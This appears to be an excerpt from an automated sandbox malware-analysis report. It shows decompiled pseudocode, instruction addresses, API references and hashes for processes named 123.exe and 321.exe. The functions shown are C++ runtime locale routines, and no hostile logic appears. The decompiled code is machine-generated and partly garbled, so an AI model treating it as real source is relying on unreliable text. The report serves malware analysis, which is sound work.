				__ecx[4] = 0;
				__ecx[5] = 0;
				__ecx[6] = 0;
				__ecx[7] = 0;
				__ecx[8] = 0;
				__ecx[9] = 0;
				__ecx[0xa] = 0;
				__ecx[0xb] = 0;
				__ecx[0xc] = 0;
				if(_v0 == 0) {
					E00195EBA("bad locale name");
					asm("int3");
					_push(_t70);
					_t71 = _t53;
					E00196191(_t53, _t71); // executed
					if(_t71[0xb] != 0) {
						E0019FF29(_t71[0xb]);
					}
					_t71[0xb] = 0;
					if(_t71[9] != 0) {
						E0019FF29(_t71[9]);
					}
					_t71[9] = 0;
					if(_t71[7] != 0) {
						E0019FF29(_t71[7]);
					}
					_t71[7] = 0;
					if(_t71[5] != 0) {
						E0019FF29(_t71[5]);
					}
					_t71[5] = 0;
					if(_t71[3] != 0) {
						E0019FF29(_t71[3]);
					}
					_t71[3] = 0;
					if(_t71[1] != 0) {
						E0019FF29(_t71[1]);
					}
					_t71[1] = 0;
					_t55 = _t71;
					_t37 =  *_t55;
					if(_t37 == 0) {
						return E001A03E1(4);
					} else {
						if(_t37 < 8) {
							return E00197A7D(0x1f02d0 + _t37 * 0x18, 0x1f02d0 + _t37 * 0x18);
						}
						return _t37;
					}
				} else {
					E00196146(__ecx, __ecx, _a4);
					return _t70;
				}
			}

0x001916b9
0x001916bd
0x001916c0
0x001916c7
0x001916ca
0x001916cd
0x001916d0
0x001916d3
0x001916d6
0x001916da
0x001916dd
0x001916e1
0x001916e4
0x001916e7
0x001916ea
0x001916f1
0x0019170b
0x00191710
0x00191711
0x00191712
0x00191716
0x00191720
0x00191725
0x0019172a
0x0019172d
0x00191733
0x00191738
0x0019173d
0x0019173e
0x00191744
0x00191749
0x0019174e
0x0019174f
0x00191755
0x0019175a
0x0019175f
0x00191760
0x00191766
0x0019176b
0x00191770
0x00191771
0x00191777
0x0019177c
0x00191781
0x00191782
0x00191785
0x00195da5
0x00195da9
0x001a040e
0x00195daf
0x00195db2
0x00000000
0x00195dc2
0x00195dc3
0x00195dc3
0x001916f3
0x001916f8
0x00191703
0x00191703

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 001916C0
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 001916F8

Part of subcall function 00196146: _Yarn.LIBCPMT ref: 00196165
Part of subcall function 00196146: _Yarn.LIBCPMT ref: 00196189

Strings

bad locale name, xrefs: 00191706

Memory Dump Source

Source File: 00000001.00000002.279331771.0000000000191000.00000020.00000001.01000000.00000008.sdmp, Offset: 00190000, based on PE: true

Associated: 00000001.00000002.279317904.0000000000190000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279360920.00000000001B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279375069.00000000001C3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279424896.00000000001EF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279438356.00000000001F0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279552010.00000000001F2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_190000_123.jbxd

Yara matches

Similarity

API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 1908188788-1405518554
Opcode ID: 05f776b37ebd2e4f607e7a2a6003b25b4011d58db68675a6a56844f81683e949
Instruction ID: c252f949d459bfb3babfb214cd4546c4466c264d47acebfb0683c7cab60cadd0
Opcode Fuzzy Hash: 05f776b37ebd2e4f607e7a2a6003b25b4011d58db68675a6a56844f81683e949
Instruction Fuzzy Hash: 21F01771506B409E87319FAA8481447FBE4BE287103908A2EE0DEC3A12D730E444CBAA

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: 321.exePID: 5152, Parent PID: 5296COMMON

Executed Functions

Function 01374E63 Relevance: 12.1, APIs: 8, Instructions: 112
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 62%

			E01374E63(void* __ebx, void* __edx, void* __edi, void* __eflags, void* _a4, void _a8) {
				signed int _v8;
				char _v12;
				signed int _v16;
				signed int _v24;
				void* _v28;
				signed int _v32;
				void* _v36;
				signed int _v40;
				signed int _v44;
				char _v56;
				intOrPtr _v60;
				signed int __esi;
				signed int _t53;
				void* _t68;
				intOrPtr* _t75;
				void* _t79;
				void* _t81;
				void* _t82;
				intOrPtr* _t83;
				signed int _t86;
				signed int _t89;

				_t76 = __edx;
				_t86 = _t89;
				_t53 =  *0x13a3014; // 0x98b2b77b
				_v8 = _t53 ^ _t86;
				_push(__ebx);
				_push(__edi);
				E01375D4D( &_v12, 0);
				_v16 =  *0x14a6144;
				_t81 = E0137181F(_a4, E0137178E(_a4, 0x14a53a4, __edx,  *0x14a6144));
				if(_t81 != 0) {
					L6:
					E01375DA5( &_v12);
					_pop(_t79);
					_pop(_t82);
					__eflags = _v8 ^ _t86;
					_pop(_t68);
					return E01377F14(_t81, _t68, _v8 ^ _t86, _t76, _t79, _t82);
				} else {
					__eflags = __edi;
					if(__edi == 0) {
						__eax =  &_v16;
						__eax = E01371937(__ebx,  &_v16, __ebx); // executed
						_pop(__ecx);
						_pop(__ecx);
						__eflags = __eax - 0xffffffff;
						if(__eflags == 0) {
							__eax = E01371664();
							asm("int3");
							_push(__ebp);
							__ebp = __esp;
							__esp = __esp - 0xc;
							__eax =  *0x13a3014; // 0x98b2b77b
							_v36 = __eax;
							_push(__ebx);
							__ebx = _v24;
							__ecx =  &_v40;
							_push(__esi);
							_push(__edi);
							__eax = E01375D4D( &_v40, 0);
							__edi =  *0x14a6148;
							__ecx = 0x14a6150;
							_v44 = __edi;
							__eax = E0137178E(__ebx, 0x14a6150, __edx, __edi);
							__ecx = __ebx;
							__esi = __eax;
							__eflags = __esi;
							if(__esi != 0) {
								L12:
								__ecx =  &_v12;
								__eax = E01375DA5( &_v12);
								__ecx = _v8;
								__eax = __esi;
								_pop(__edi);
								_pop(__esi);
								__ecx = _v8 ^ __ebp;
								__eflags = __ecx;
								_pop(__ebx);
								__eax = E01377F14(__esi, __ebx, __ecx, __edx, __edi, __esi);
								__esp = __ebp;
								_pop(__ebp);
								return __eax;
							} else {
								__eflags = __edi;
								if(__edi == 0) {
									__eax =  &_v16;
									__eax = E0137568F(__ebx,  &_v16, __ebx);
									_pop(__ecx);
									_pop(__ecx);
									__eflags = __eax - 0xffffffff;
									if(__eflags == 0) {
										__eax = E01371664();
										asm("int3");
										_push(0x18);
										0x13936f5 = E0137826F(0x13936f5, __ebx, __edi, __esi);
										__ebx = __ecx;
										__eax = _a4;
										_v28 = __eax;
										__eax = __eax -  *__ebx;
										_v24 = __eax;
										 *(__ebx + 4) =  *(__ebx + 4) -  *__ebx;
										__eax =  *(__ebx + 4) -  *__ebx >> 2;
										__esi = 0x3fffffff;
										__eflags = __eax - 0x3fffffff;
										if(__eflags == 0) {
											__eax = E013756D9(__ebx, __ecx, __edi, __eflags);
											goto L24;
										} else {
											__edi = __eax + 1;
											_v36 = __edi;
											 *(__ebx + 8) =  *(__ebx + 8) -  *__ebx;
											__ecx =  *(__ebx + 8) -  *__ebx >> 2;
											__edx = __ecx;
											__edx = __ecx >> 1;
											0x3fffffff = 0x3fffffff - __edx;
											__eflags = __ecx - 0x3fffffff - __edx;
											if(__ecx <= 0x3fffffff - __edx) {
												__eax = __ecx + __edx;
												__esi = __edi;
												__eflags = __eax - __edi;
												__esi =  >=  ? __eax : __edi;
												_v32 = __esi;
												__eflags = __esi - 0x3fffffff;
												if(__esi > 0x3fffffff) {
													L24:
													L1();
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													__eax = _v36;
													__ecx = __eax + 0x23;
													__eflags = __ecx - __eax;
													if(__eflags <= 0) {
														_push(_t86);
														_t75 =  &_v56;
														E013712A6(_t75);
														E0137938D( &_v56, 0x13a2844);
														asm("int3");
														_push(_t81);
														_t83 = _t75;
														E01371234(_t75, _v60);
														 *_t83 = 0x1394288;
														return _t83;
													} else {
														__eax = E01377F22(__esi, __eflags, __ecx);
														_pop(__ecx);
														__ecx = __eax;
														__eflags = __ecx;
														if(__eflags == 0) {
															_push(__esi);
															__esi = __esi ^ __esi;
															__eax = E013800DB(__ecx, __esi, __eflags, __esi, __esi, __esi, __esi, __esi);
															_push(__esi);
															_push(__esi);
															_push(__esi);
															_push(__esi);
															_push(__esi);
															L30();
															asm("int3");
															__eax = IsProcessorFeaturePresent(0x17);
															__eflags = __eax;
															if(__eax != 0) {
																__ecx = 5;
																asm("int 0x29");
															}
															__esi = 0xc0000417;
															__eax = E0137FF93(__ebx, __edx, 0xc0000417, 2, 0xc0000417, 1);
															__eax = GetCurrentProcess();
															__eax = TerminateProcess(__eax, 0xc0000417);
															__esi = __esi;
															return __eax;
														} else {
															_t51 = __ecx + 0x23; // 0x23
															__eax = _t51;
															__eax = _t51 & 0xffffffe0;
															__eflags = __eax;
															 *(__eax - 4) = __ecx;
															return __eax;
														}
													}
												} else {
													goto L17;
												}
											} else {
												_v32 = 0x3fffffff;
												L17:
												__edi = E01372AAC(__ebx, __ebp, __esi << 2);
												_v40 = __edi;
												_v8 = _v8 & 0x00000000;
												__eax = _v24;
												__eax = __edi + _v24 * 4;
												_v24 = __eax;
												_a8 =  *_a8;
												 *__eax =  *_a8;
												__eax =  *(__ebx + 4);
												__ecx = _v28;
												__eflags = __ecx - __eax;
												if(__ecx != __eax) {
													__eax = E01378BD0(__edi,  *__ebx, __ecx);
													_v24 = _v24 + 4;
													__eax =  *(__ebx + 4);
													__edx = _v28;
													__eax =  *(__ebx + 4) - __edx;
													__eflags = __eax;
													_push(__eax);
													_push(__edx);
													_push(_v24 + 4);
												} else {
													_push(__eax);
													_push( *__ebx);
													_push(__edi);
												}
												__eax = E01378BD0();
												__esp = __esp + 0xc;
												_t45 =  &_v8;
												 *_t45 = _v8 | 0xffffffff;
												__eflags =  *_t45;
												__ecx = __ebx;
												__eax = E013756E4(__ebx, __edi, _v36, __esi);
												__eax = _v24;
												return E013781D4(_v24);
											}
										}
									} else {
										__esi = _v16;
										E01376014(__eflags, __esi) =  *__esi;
										__ecx = __esi;
										__eax =  *((intOrPtr*)( *__esi + 4))();
										 *0x14a6148 = __esi;
										goto L12;
									}
								} else {
									__esi = __edi;
									goto L12;
								}
							}
						} else {
							__esi = _v16;
							E01376014(__eflags, __esi) =  *__esi;
							__ecx = __esi;
							__eax =  *((intOrPtr*)( *__esi + 4))();
							 *0x14a6144 = __esi;
							goto L6;
						}
					} else {
						__esi = __edi;
						goto L6;
					}
				}
			}

0x01374e63
0x01374e64
0x01374e69
0x01374e70
0x01374e73
0x01374e7b
0x01374e7e
0x01374e8e
0x01374e9e
0x01374ea2
0x01374ed4
0x01374ed7
0x01374ee1
0x01374ee2
0x01374ee3
0x01374ee5
0x01374eec
0x01374ea4
0x01374ea4
0x01374ea6
0x01374eac
0x01374eb1
0x01374eb6
0x01374eb7
0x01374eb8
0x01374ebb
0x01374eed
0x01374ef2
0x01374ef3
0x01374ef4
0x01374ef6
0x01374ef9
0x01374f00
0x01374f03
0x01374f04
0x01374f07
0x01374f0a
0x01374f0b
0x01374f0e
0x01374f13
0x01374f19
0x01374f1e
0x01374f21
0x01374f27
0x01374f2e
0x01374f30
0x01374f32
0x01374f64
0x01374f64
0x01374f67
0x01374f6c
0x01374f6f
0x01374f71
0x01374f72
0x01374f73
0x01374f73
0x01374f75
0x01374f76
0x01374f7b
0x01374f7b
0x01374f7c
0x01374f34
0x01374f34
0x01374f36
0x01374f3c
0x01374f41
0x01374f46
0x01374f47
0x01374f48
0x01374f4b
0x01374f7d
0x01374f82
0x01374f83
0x01374f8a
0x01374f8f
0x01374f91
0x01374f94
0x01374f97
0x01374f9c
0x01374fa2
0x01374fa4
0x01374fa7
0x01374fac
0x01374fae
0x01375075
0x00000000
0x01374fb4
0x01374fb4
0x01374fb7
0x01374fbd
0x01374fbf
0x01374fc2
0x01374fc4
0x01374fc8
0x01374fca
0x01374fcc
0x01375008
0x0137500b
0x0137500d
0x0137500f
0x01375012
0x01375015
0x0137501b
0x0137507a
0x0137507a
0x0137507f
0x01375080
0x01375081
0x01375082
0x01375083
0x01375084
0x01375085
0x01375089
0x0137508c
0x0137508e
0x013712be
0x013712c4
0x013712c7
0x013712d5
0x013712da
0x013712db
0x013712e0
0x013712e2
0x013712e7
0x013712f0
0x01375094
0x01375095
0x0137509a
0x0137509b
0x0137509d
0x0137509f
0x01380151
0x01380152
0x01380159
0x01380161
0x01380162
0x01380163
0x01380164
0x01380165
0x01380166
0x0138016b
0x0138016e
0x01380174
0x01380176
0x0138017a
0x0138017b
0x0138017b
0x01380180
0x01380188
0x01380191
0x01380198
0x0138019e
0x0138019f
0x013750a1
0x013750a1
0x013750a1
0x013750a4
0x013750a4
0x013750a7
0x013750aa
0x013750aa
0x0137509f
0x0137501d
0x00000000
0x0137501d
0x01374fce
0x01374fce
0x01374fd1
0x01374fdd
0x01374fdf
0x01374fe2
0x01374fe6
0x01374fe9
0x01374fec
0x01374ff2
0x01374ff4
0x01374ff6
0x01374ff9
0x01374ffc
0x01374ffe
0x01375025
0x01375030
0x01375033
0x01375036
0x01375039
0x01375039
0x0137503b
0x0137503c
0x0137503d
0x01375000
0x01375002
0x01375003
0x01375005
0x01375005
0x0137503e
0x01375043
0x01375046
0x01375046
0x01375046
0x0137504f
0x01375051
0x01375056
0x0137505e
0x0137505e
0x01374fcc
0x01374f4d
0x01374f4d
0x01374f56
0x01374f59
0x01374f5b
0x01374f5e
0x00000000
0x01374f5e
0x01374f38
0x01374f38
0x00000000
0x01374f38
0x01374f36
0x01374ebd
0x01374ebd
0x01374ec6
0x01374ec9
0x01374ecb
0x01374ece
0x00000000
0x01374ece
0x01374ea8
0x01374ea8
0x00000000
0x01374ea8
0x01374ea6

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 01374E7E

Part of subcall function 0137178E: std::_Lockit::_Lockit.LIBCPMT ref: 013717AA
Part of subcall function 0137178E: std::_Lockit::~_Lockit.LIBCPMT ref: 013717C6

std::_Facet_Register.LIBCPMT ref: 01374EC1
std::_Lockit::~_Lockit.LIBCPMT ref: 01374ED7
Concurrency::cancel_current_task.LIBCPMT ref: 01374EED
std::_Lockit::_Lockit.LIBCPMT ref: 01374F0E
std::_Lockit::~_Lockit.LIBCPMT ref: 01374F67

Part of subcall function 0137568F: std::_Locinfo::~_Locinfo.LIBCPMT ref: 013756CD

std::_Facet_Register.LIBCPMT ref: 01374F51
Concurrency::cancel_current_task.LIBCPMT ref: 01374F7D

Memory Dump Source

Source File: 00000002.00000002.281026800.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true

Associated: 00000002.00000002.280939181.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281545635.0000000001394000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281900158.00000000013A3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.284995880.00000000014A4000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285035285.00000000014A5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285069288.00000000014A7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1370000_321.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register$LocinfoLocinfo::~_
String ID:
API String ID: 2309000532-0
Opcode ID: 5dd308ac03dae3e50ab7830f43a9c82cbc573016fd78ccea61b9fc3085a2e2df
Instruction ID: 545d31ecb43d7866acdde68089742ab2f3c7212741990041c491dc1781afa38a
Opcode Fuzzy Hash: 5dd308ac03dae3e50ab7830f43a9c82cbc573016fd78ccea61b9fc3085a2e2df
Instruction Fuzzy Hash: 07312D72A00119ABCB34FF6CD8849ADBBB8EF94228F110559E92697380DF38FD09C750

Uniqueness

Uniqueness Score: -1.00%

Function 013762C5 Relevance: 10.6, APIs: 7, Instructions: 82
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			E013762C5(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t36;
				void* _t41;
				intOrPtr* _t64;
				intOrPtr* _t75;
				intOrPtr* _t76;
				void* _t78;

				_t71 = __edx;
				_t58 = __ebx;
				_push(8);
				E01378206(0x1393751, __ebx, __edi, __esi);
				E01375D4D(_t78 - 0x14, 0);
				_t75 =  *0x14a5480; // 0x0
				 *(_t78 - 4) =  *(_t78 - 4) & 0x00000000;
				 *((intOrPtr*)(_t78 - 0x10)) = _t75;
				_t36 = E0137181F( *((intOrPtr*)(_t78 + 8)), E0137178E(__ebx, 0x14a539c, __edx, __edi));
				_t73 = _t36;
				if(_t36 != 0) {
					L5:
					E01375DA5(_t78 - 0x14);
					return E013781D4(_t73);
				} else {
					if(_t75 == 0) {
						_push( *((intOrPtr*)(_t78 + 8)));
						_push(_t78 - 0x10);
						_t41 = E013767F4(__ebx, _t73, _t75, __eflags);
						_pop(_t64);
						__eflags = _t41 - 0xffffffff;
						if(__eflags == 0) {
							E01371664();
							asm("int3");
							_push(8);
							E01378206(0x139378f, __ebx, _t73, _t75);
							_t76 = _t64;
							 *((intOrPtr*)(_t78 - 0x14)) = _t76;
							 *((intOrPtr*)(_t78 - 0x10)) = 0;
							__eflags =  *((intOrPtr*)(_t78 + 0x10));
							if( *((intOrPtr*)(_t78 + 0x10)) != 0) {
								 *_t76 = 0x13943e0;
								 *((intOrPtr*)(_t76 + 0x10)) = 0;
								 *((intOrPtr*)(_t76 + 0x30)) = 0;
								 *((intOrPtr*)(_t76 + 0x34)) = 0;
								 *((intOrPtr*)(_t76 + 0x38)) = 0;
								 *((intOrPtr*)(_t76 + 8)) = 0x13943d4;
								 *(_t78 - 4) = 0;
								 *((intOrPtr*)(_t78 - 0x10)) = 1;
							}
							 *((intOrPtr*)(_t76 +  *((intOrPtr*)( *_t76 + 4)))) = 0x13943dc;
							_t28 =  *((intOrPtr*)( *_t76 + 4)) - 8; // -8
							 *((intOrPtr*)( *((intOrPtr*)( *_t76 + 4)) + _t76 - 4)) = _t28;
							__eflags =  *((intOrPtr*)( *_t76 + 4)) + _t76;
							E01376CB1(_t58,  *((intOrPtr*)( *_t76 + 4)) + _t76, _t71, _t73,  *((intOrPtr*)( *_t76 + 4)) + _t76,  *((intOrPtr*)(_t78 + 8)),  *((intOrPtr*)(_t78 + 0xc))); // executed
							return E013781D4(_t76);
						} else {
							_t73 =  *((intOrPtr*)(_t78 - 0x10));
							 *((intOrPtr*)(_t78 - 0x10)) = _t73;
							 *(_t78 - 4) = 1;
							E01376014(__eflags, _t73);
							 *0x1394134();
							 *((intOrPtr*)( *((intOrPtr*)( *_t73 + 4))))();
							 *0x14a5480 = _t73;
							goto L5;
						}
					} else {
						_t73 = _t75;
						goto L5;
					}
				}
			}

0x013762c5
0x013762c5
0x013762c5
0x013762cc
0x013762d6
0x013762db
0x013762e6
0x013762ea
0x013762f6
0x013762fb
0x013762ff
0x01376344
0x01376347
0x01376353
0x01376301
0x01376303
0x01376309
0x0137630f
0x01376310
0x01376316
0x01376317
0x0137631a
0x01376354
0x01376359
0x0137635a
0x01376361
0x01376366
0x01376368
0x0137636d
0x01376370
0x01376373
0x01376375
0x0137637b
0x0137637e
0x01376381
0x01376384
0x01376387
0x0137638e
0x01376391
0x01376391
0x013763a3
0x013763af
0x013763b2
0x013763bb
0x013763bd
0x013763c9
0x0137631c
0x0137631c
0x0137631f
0x01376323
0x01376327
0x01376334
0x0137633c
0x0137633e
0x00000000
0x0137633e
0x01376305
0x01376305
0x00000000
0x01376305
0x01376303

APIs

__EH_prolog3.LIBCMT ref: 013762CC
std::_Lockit::_Lockit.LIBCPMT ref: 013762D6

Part of subcall function 0137178E: std::_Lockit::_Lockit.LIBCPMT ref: 013717AA
Part of subcall function 0137178E: std::_Lockit::~_Lockit.LIBCPMT ref: 013717C6

codecvt.LIBCPMT ref: 01376310
std::_Facet_Register.LIBCPMT ref: 01376327
std::_Lockit::~_Lockit.LIBCPMT ref: 01376347
Concurrency::cancel_current_task.LIBCPMT ref: 01376354
__EH_prolog3.LIBCMT ref: 01376361

Memory Dump Source

Source File: 00000002.00000002.281026800.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true

Associated: 00000002.00000002.280939181.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281545635.0000000001394000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281900158.00000000013A3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.284995880.00000000014A4000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285035285.00000000014A5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285069288.00000000014A7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1370000_321.jbxd

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registercodecvt
String ID:
API String ID: 614290800-0
Opcode ID: b5cda32fc7b805476128e59cf4dabd0e4928dce4fe012f8c3ba38ef04abd4689
Instruction ID: 3e100dd54310815ff8eda8c6231694bfde35aa48569bd8cdfe89ad5606096f14
Opcode Fuzzy Hash: b5cda32fc7b805476128e59cf4dabd0e4928dce4fe012f8c3ba38ef04abd4689
Instruction Fuzzy Hash: 7A31BFB5A0061ACFDB25EF68C594AAEBBF0FF58308F14441DD855AB350DB79AA05CB80

Uniqueness

Uniqueness Score: -1.00%

Function 01383ED2 Relevance: 7.7, APIs: 5, Instructions: 186
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 76%

			E01383ED2(void* __ebx, signed int __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				intOrPtr* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v60;
				char _v276;
				short _v278;
				short _v280;
				char _v448;
				signed int _v452;
				short _v454;
				intOrPtr _v456;
				signed int _v460;
				intOrPtr _v464;
				signed int _v468;
				signed int _v472;
				intOrPtr _v512;
				char _v536;
				intOrPtr _v540;
				signed int _v544;
				intOrPtr _v548;
				signed int _v560;
				char _v708;
				signed int _v712;
				short _v714;
				signed int _v716;
				signed int _v720;
				signed int _v724;
				intOrPtr _v728;
				signed int _v732;
				intOrPtr _v736;
				signed int* _v740;
				signed int _v744;
				signed int _v748;
				signed int _v752;
				char _v824;
				char _v1252;
				char _v1268;
				intOrPtr _v1284;
				signed int _v1288;
				intOrPtr _v1324;
				signed int _v1336;
				void* __ebp;
				signed int _t249;
				signed int _t251;
				void* _t254;
				signed int _t257;
				signed int _t259;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				signed int _t268;
				signed int _t269;
				signed int _t270;
				void* _t272;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				signed int _t277;
				signed int _t280;
				signed int _t287;
				signed int _t288;
				signed int _t290;
				signed int _t291;
				intOrPtr _t292;
				signed int _t295;
				signed int _t297;
				signed int _t298;
				signed int _t301;
				signed int _t303;
				signed int _t306;
				signed int _t307;
				signed int _t309;
				signed int _t310;
				signed int _t326;
				signed int _t328;
				signed int _t330;
				signed int _t334;
				void* _t335;
				signed int _t337;
				void* _t338;
				intOrPtr _t339;
				signed int _t343;
				signed int _t344;
				intOrPtr* _t349;
				signed int _t363;
				signed int _t365;
				void* _t366;
				signed int _t367;
				intOrPtr* _t368;
				signed int _t370;
				void* _t371;
				void* _t375;
				signed int _t379;
				intOrPtr* _t380;
				intOrPtr* _t383;
				void* _t386;
				signed int _t387;
				signed int _t390;
				intOrPtr* _t391;
				char* _t398;
				intOrPtr _t402;
				intOrPtr* _t403;
				signed int _t405;
				signed int _t410;
				signed int _t411;
				intOrPtr* _t415;
				intOrPtr* _t416;
				signed int _t425;
				short _t426;
				signed int _t428;
				intOrPtr _t429;
				void* _t430;
				signed int _t432;
				intOrPtr _t433;
				void* _t434;
				signed int _t435;
				signed int _t438;
				intOrPtr _t444;
				signed int _t445;
				void* _t446;
				signed int _t447;
				signed int _t448;
				void* _t450;
				signed int _t452;
				signed int _t454;
				signed int _t457;
				signed int* _t458;
				short _t459;
				signed int _t461;
				signed int _t462;
				void* _t464;
				void* _t465;
				signed int _t466;
				void* _t467;
				void* _t468;
				signed int _t469;
				void* _t471;
				void* _t472;
				signed int _t484;

				_t424 = __edx;
				_push(__ebx);
				_push(__esi);
				_v12 = 1;
				_t249 = E0138871A(0x6a6); // executed
				_t363 = _t249;
				_t250 = 0;
				_pop(_t375);
				if(_t363 == 0) {
					L20:
					return _t250;
				} else {
					_push(__edi);
					 *_t363 = 1;
					_t2 = _t363 + 4; // 0x4
					_t428 = _t2;
					_t444 = _a4;
					 *_t428 = 0;
					_t251 = _t444 + 0x30;
					_push( *_t251);
					_v16 = _t251;
					_push(0x13972d8);
					_push( *0x1397214);
					E01383E0E(_t363, _t375, __edx, _t428, _t444, _t428, 0x351, 3);
					_t465 = _t464 + 0x18;
					_v8 = 0x1397214;
					while(1) {
						L2:
						_t254 = E0138C3EA(_t428, 0x351, 0x13972d4);
						_t466 = _t465 + 0xc;
						if(_t254 != 0) {
							break;
						} else {
							_t8 = _v16 + 0x10; // 0x10
							_t415 = _t8;
							_t343 =  *_v16;
							_v16 = _t415;
							_t416 =  *_t415;
							_v20 = _t416;
							goto L4;
						}
						while(1) {
							L4:
							_t424 =  *_t343;
							if(_t424 !=  *_t416) {
								break;
							}
							if(_t424 == 0) {
								L8:
								_t344 = 0;
							} else {
								_t424 =  *((intOrPtr*)(_t343 + 2));
								if(_t424 !=  *((intOrPtr*)(_t416 + 2))) {
									break;
								} else {
									_t343 = _t343 + 4;
									_t416 = _t416 + 4;
									if(_t424 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							_push(_v20);
							_push(0x13972d8);
							asm("sbb eax, eax");
							_v12 = _v12 &  !( ~_t344);
							_t349 = _v8 + 0xc;
							_v8 = _t349;
							_push( *_t349);
							E01383E0E(_t363, _t416, _t424, _t428, _t444, _t428, 0x351, 3);
							_t465 = _t466 + 0x18;
							if(_v8 < 0x1397244) {
								goto L2;
							} else {
								if(_v12 != 0) {
									E013871B2(_t363);
									_t435 = _t428 | 0xffffffff;
									__eflags =  *(_t444 + 0x28);
									if(__eflags != 0) {
										asm("lock xadd [ecx], eax");
										if(__eflags == 0) {
											E013871B2( *(_t444 + 0x28));
										}
									}
									__eflags =  *(_t444 + 0x24);
									if( *(_t444 + 0x24) != 0) {
										asm("lock xadd [eax], edi");
										__eflags = _t435 == 1;
										if(_t435 == 1) {
											E013871B2( *(_t444 + 0x24));
										}
									}
									 *(_t444 + 0x24) = 0;
									 *(_t444 + 0x1c) = 0;
									 *(_t444 + 0x28) = 0;
									 *((intOrPtr*)(_t444 + 0x20)) = 0;
									_t250 =  *((intOrPtr*)(_t444 + 0x40));
								} else {
									_t438 = _t428 | 0xffffffff;
									_t484 =  *(_t444 + 0x28);
									if(_t484 != 0) {
										asm("lock xadd [ecx], eax");
										if(_t484 == 0) {
											E013871B2( *(_t444 + 0x28));
										}
									}
									if( *(_t444 + 0x24) != 0) {
										asm("lock xadd [eax], edi");
										if(_t438 == 1) {
											E013871B2( *(_t444 + 0x24));
										}
									}
									 *(_t444 + 0x24) =  *(_t444 + 0x24) & 0x00000000;
									_t28 = _t363 + 4; // 0x4
									_t250 = _t28;
									 *(_t444 + 0x1c) =  *(_t444 + 0x1c) & 0x00000000;
									 *(_t444 + 0x28) = _t363;
									 *((intOrPtr*)(_t444 + 0x20)) = _t250;
								}
								goto L20;
							}
							goto L134;
						}
						asm("sbb eax, eax");
						_t344 = _t343 | 0x00000001;
						__eflags = _t344;
						goto L10;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E0138016C();
					asm("int3");
					_t461 = _t466;
					_t467 = _t466 - 0x1d0;
					_t257 =  *0x13a3014; // 0x98b2b77b
					_v60 = _t257 ^ _t461;
					_t259 = _v44;
					_push(_t363);
					_push(_t444);
					_t445 = _v40;
					_push(_t428);
					_t429 = _v48;
					_v512 = _t429;
					__eflags = _t259;
					if(_t259 == 0) {
						_v460 = 1;
						_v472 = 0;
						_t365 = 0;
						_v452 = 0;
						__eflags = _t445;
						if(__eflags == 0) {
							L79:
							_t259 = E01383ED2(_t365, _t424, _t429, _t445, __eflags, _t429); // executed
							goto L80;
						} else {
							__eflags =  *_t445 - 0x4c;
							if( *_t445 != 0x4c) {
								L59:
								_t259 = E01383A48(_t365, _t424, _t429, _t445, _t445,  &_v276, 0x83,  &_v448, 0x55,  &_v468);
								_t468 = _t467 + 0x18;
								__eflags = _t259;
								if(_t259 != 0) {
									_t379 = 0;
									__eflags = 0;
									_t425 = _t429 + 0x20;
									_t447 = 0;
									_v452 = _t425;
									do {
										__eflags = _t447;
										if(_t447 == 0) {
											L74:
											_t265 = _v460;
										} else {
											_t380 =  *_t425;
											_t266 =  &_v276;
											while(1) {
												__eflags =  *_t266 -  *_t380;
												_t429 = _v464;
												if( *_t266 !=  *_t380) {
													break;
												}
												__eflags =  *_t266;
												if( *_t266 == 0) {
													L67:
													_t379 = 0;
													_t267 = 0;
												} else {
													_t426 =  *((intOrPtr*)(_t266 + 2));
